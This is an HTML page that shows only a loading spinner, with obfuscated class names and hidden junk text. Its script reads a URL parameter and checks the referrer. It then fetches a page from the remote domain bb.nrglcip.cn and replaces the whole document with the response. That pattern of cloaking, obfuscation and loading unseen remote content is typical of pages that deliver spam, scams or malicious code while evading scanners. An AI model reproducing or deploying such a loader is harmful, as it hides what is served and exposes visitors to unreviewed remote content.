<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UP9oe1V {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UP9oe1V .OOYvmfsVKD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UP9oe1V .content {
            line-height: 50px;
            text-align: center
        }

        .UP9oe1V .img {
            width: 100%
        }

        .UP9oe1V .l1uu4bB33 {
            text-align: center
        }

        .UP9oe1V .l1uu4bB33 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UP9oe1V .l1uu4bB33 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UP9oe1V .l1uu4bB33 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UP9oe1V .l1uu4bB33 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UP9oe1V .l1uu4bB33 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UP9oe1V .l1uu4bB33 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UP9oe1V .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function oCyCdV5Yjemf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zzKEB = oCyCdV5Yjemf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zzKEB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zzKEB +".html?a=share";
		}
		
        BNzDoIGW=url+"#"+new Date().getTime();
        BNzDoIGW && function() {
            $.get(BNzDoIGW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>FVO5XDn4cXV3CI7</div>
<ul style='display:none' >in4vUvfbeOnMfKdreDWJlKnHBX5FF9sXUDPiVeWuWWgP191aDUfulzac2nCKePA8xvTdT4uXAr6HCpx</ul>
<h1 style='display:none' >e2o79ccYM42h1GsGIyytZrRqPe</h1>
<h1 style='display:none' >e2o79ccYM42h1GsGIyytZrRqPe</h1>
<ul style='display:none' >in4vUvfbeOnMfKdreDWJlKnHBX5FF9sXUDPiVeWuWWgP191aDUfulzac2nCKePA8xvTdT4uXAr6HCpx</ul>
<span style='display:none'>wQqGKbIrMULAUw5ucqPcwgqxEaCEvAfM7qHy</span>
<span style='display:none'>wQqGKbIrMULAUw5ucqPcwgqxEaCEvAfM7qHy</span>
<li style='display:none' >rPCKNf2yy4BtFRiXKUpRIJ4SkdVdXm7TFRirH5MhPMEurASa2IOw0xgnVUW5yY4RIEQDUF</li>
<div style='display:none'>FVO5XDn4cXV3CI7</div><div class="UP9oe1V">
    <div class="OOYvmfsVKD">
        <div class="l1uu4bB33">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >qAn4HnZzogD74</b>
<b style='display:none' >qAn4HnZzogD74</b>
<span style='display:none'>vVNqo4nIhYfX0RZgqdvO1cV7GifIOfRNnL4fAp2Db7uo1NAL3tQpCfLNaGuoDvHLSrPXppRlQeDv6viBgSKapYY5OsevY</span></body>
</html>